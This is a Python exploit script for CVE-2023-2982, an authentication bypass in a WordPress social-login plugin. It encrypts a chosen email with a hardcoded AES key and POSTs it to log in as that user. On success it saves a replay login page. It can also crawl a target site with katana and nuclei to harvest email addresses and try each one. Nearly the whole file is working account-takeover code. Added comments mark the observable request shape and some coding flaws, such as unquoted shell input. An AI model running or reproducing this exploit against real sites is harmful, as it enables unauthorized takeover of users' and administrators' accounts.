#!/usr/bin/python3

import sys
import getopt
import requests
import os
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad##, unpad
import base64
import argparse
import random
import string
import requests
import json
import lxml.etree as ET
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# One shared session so that cookies set by the target (the WordPress login
# cookie that try_login looks for) persist across requests.
session = requests.Session()

# Browser-like User-Agent attached to every request made through `session`.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
session.headers['User-Agent'] = user_agent

# Fixed AES key that try_login uses to encrypt the submitted email address.
passphrase = 'jMj7MEdu4wkHObiD'

# Four random digits used to name the output file written by try_login.
random_string = ''.join(random.choices(string.digits, k=4))


def try_login(website_url: str, email: str) -> None:
    """Send one ``moopenid`` login request for *email* and save a replay page on success.

    The email is AES-ECB encrypted with the module-level ``passphrase``,
    base64-encoded and POSTed as a form to the site root.  Success is judged
    solely by a ``wordpress_logged_in`` cookie appearing in the shared
    ``session`` cookie jar; in that case the template ``login.html`` (expected
    in the current working directory) is filled in and written out as
    ``login-<random_string>.html``.

    Args:
        website_url: Base URL of the site; normalised to end in one slash.
        email: Plaintext email address to submit.

    Raises:
        FileNotFoundError: if ``login.html`` is absent after a successful
            login — only ``requests`` errors are caught below.
    """
    # Normalise to exactly one trailing slash.  Note that '\/' is not a valid
    # Python escape: the literal is backslash + slash, so rstrip removes
    # trailing characters of either kind.
    website_url = website_url.rstrip('\/') + '/'

    # Encrypt with the fixed key in ECB mode (PKCS#7 padding), then base64.
    # Because the key and mode are fixed, the ciphertext for a given email is
    # static and reusable, which is why the file written below must be
    # handled with the same care as a session cookie.
    cipher = AES.new(passphrase.encode('utf-8'), AES.MODE_ECB)
    padded_email = pad(email.encode('utf-8'), AES.block_size)
    encrypted_email = cipher.encrypt(padded_email)
    encoded_email = base64.b64encode(encrypted_email).decode('utf-8')
    # Form POST to the site root with option=moopenid, the base64 ciphertext and
    # a fixed appName value; redirects are not followed, TLS certificate
    # validation is disabled and the call times out after 10 s.  From a
    # detection standpoint this request shape is the observable indicator.
    # The response object itself is never inspected.
    try:
       response = session.post(website_url, headers={'Content-Type': 'application/x-www-form-urlencoded'},
                             data={'option': 'moopenid', 'email': encoded_email, 'appName': 'rlHeqZw2vrPzOiWWfCParA=='},
                             allow_redirects=False,verify=False,timeout=10)

       # Success criterion: any cookie in the session jar whose name contains
       # 'wordpress_logged_in'.  Nothing else about the response is checked.
       if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
          # Fill the WEBSITE_REPLACE / EMAIL_REPLACE placeholders in the template.
          # login.html is kept open while the output file is written (harmless,
          # but the two `file` bindings shadow each other and the builtin).
          with open("login.html", 'r') as file:
               file_content = file.read()
               replaced_content = file_content.replace('WEBSITE_REPLACE', website_url).replace('EMAIL_REPLACE', encoded_email)
               # Write the filled-in page, which embeds the target URL and the
               # reusable ciphertext, then launch it with the `open` command
               # (macOS).  The shell string is safe only because random_string
               # consists of digits.
               with open("login-"+random_string+".html", 'w') as file:
                    file.write(replaced_content)
                    print("Login Worked!")
                    print("To Login again open login-"+random_string+".html")
                    os.system("open login-"+random_string+".html")

       else:
           print("Login Failed with "+email+"")
    # Only transport-level errors (connection, timeout, ...) are handled here;
    # file errors from the success branch propagate to the caller.
    except requests.exceptions.RequestException as e:
           print('Error occurred while logging in:', str(e))

def scan_and_extract(website_url: str) -> None:
    """Crawl *website_url* for email addresses and call ``try_login`` with each one.

    Shells out to the external ``katana`` crawler and to ``nuclei`` with the
    ``email-extraction.yaml`` template from the current directory; both tools
    must be on PATH and their exit codes are not checked.  Intermediate
    results live at fixed paths under ``/tmp``.

    Args:
        website_url: URL passed verbatim to ``katana -u`` and to ``try_login``.
    """
    # NOTE(review): website_url is spliced unquoted into a shell command line,
    # so shell metacharacters in the argument are interpreted by os.system; a
    # subprocess.run([...]) argument list would avoid that.
    cmd1 = "katana -kf all -u "+website_url+" -o /tmp/katana.txt"
    # Email regex template used with nuclei:
    # https://github.com/panch0r3d/nuclei-templates/blob/master/email-extraction.yaml
    cmd2 = "nuclei -l /tmp/katana.txt -t email-extraction.yaml -nc -nm -fr -o /tmp/nuc.txt"
    print("Crawling "+website_url+" for email addresses.")
    os.system(cmd1)
    print("Using Nuclei to extract emails from links")
    os.system(cmd2)
    # Fixed paths in /tmp (typically world-writable): on a shared host another
    # local user can pre-create or symlink these files; the output is read back
    # here and truncated again below.
    with open("/tmp/nuc.txt", "r") as f:
        lines = f.readlines()
    emails = set()
    for line in lines:
        # Second-pass regex over nuclei's output.  '|' inside the TLD character
        # class is a literal pipe, not alternation — harmless but unintended.
        matches = re.findall(r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b', line)
        emails.update(matches)
    # Overwrite /tmp/nuc.txt with the de-duplicated list (set order is
    # arbitrary) and attempt each address as it is written; an exception from
    # try_login leaves a partially written file behind.
    with open("/tmp/nuc.txt", "w") as f:
        for email in emails:
            f.write(email + "\n")
            try_login(website_url,email)

def main() -> None:
    """Parse the command line and dispatch to a single-email or crawl run.

    ``-w/--website_url`` is mandatory.  When ``-e/--email`` is given, only
    that address is tried via ``try_login``; otherwise ``scan_and_extract``
    crawls the site for addresses first.
    """
    parser = argparse.ArgumentParser(description='CVE-2023-2982.py')
    parser.add_argument('-w', '--website_url', required=True,help='Website URL')
    parser.add_argument('-e', '--email',required=False, help='Email')
    args = parser.parse_args()

    if args.email:
        try_login(args.website_url, args.email)
        return

    scan_and_extract(args.website_url)
    
    


# Script entry point; argument parsing and dispatch live in main().
if __name__ == "__main__":
    main()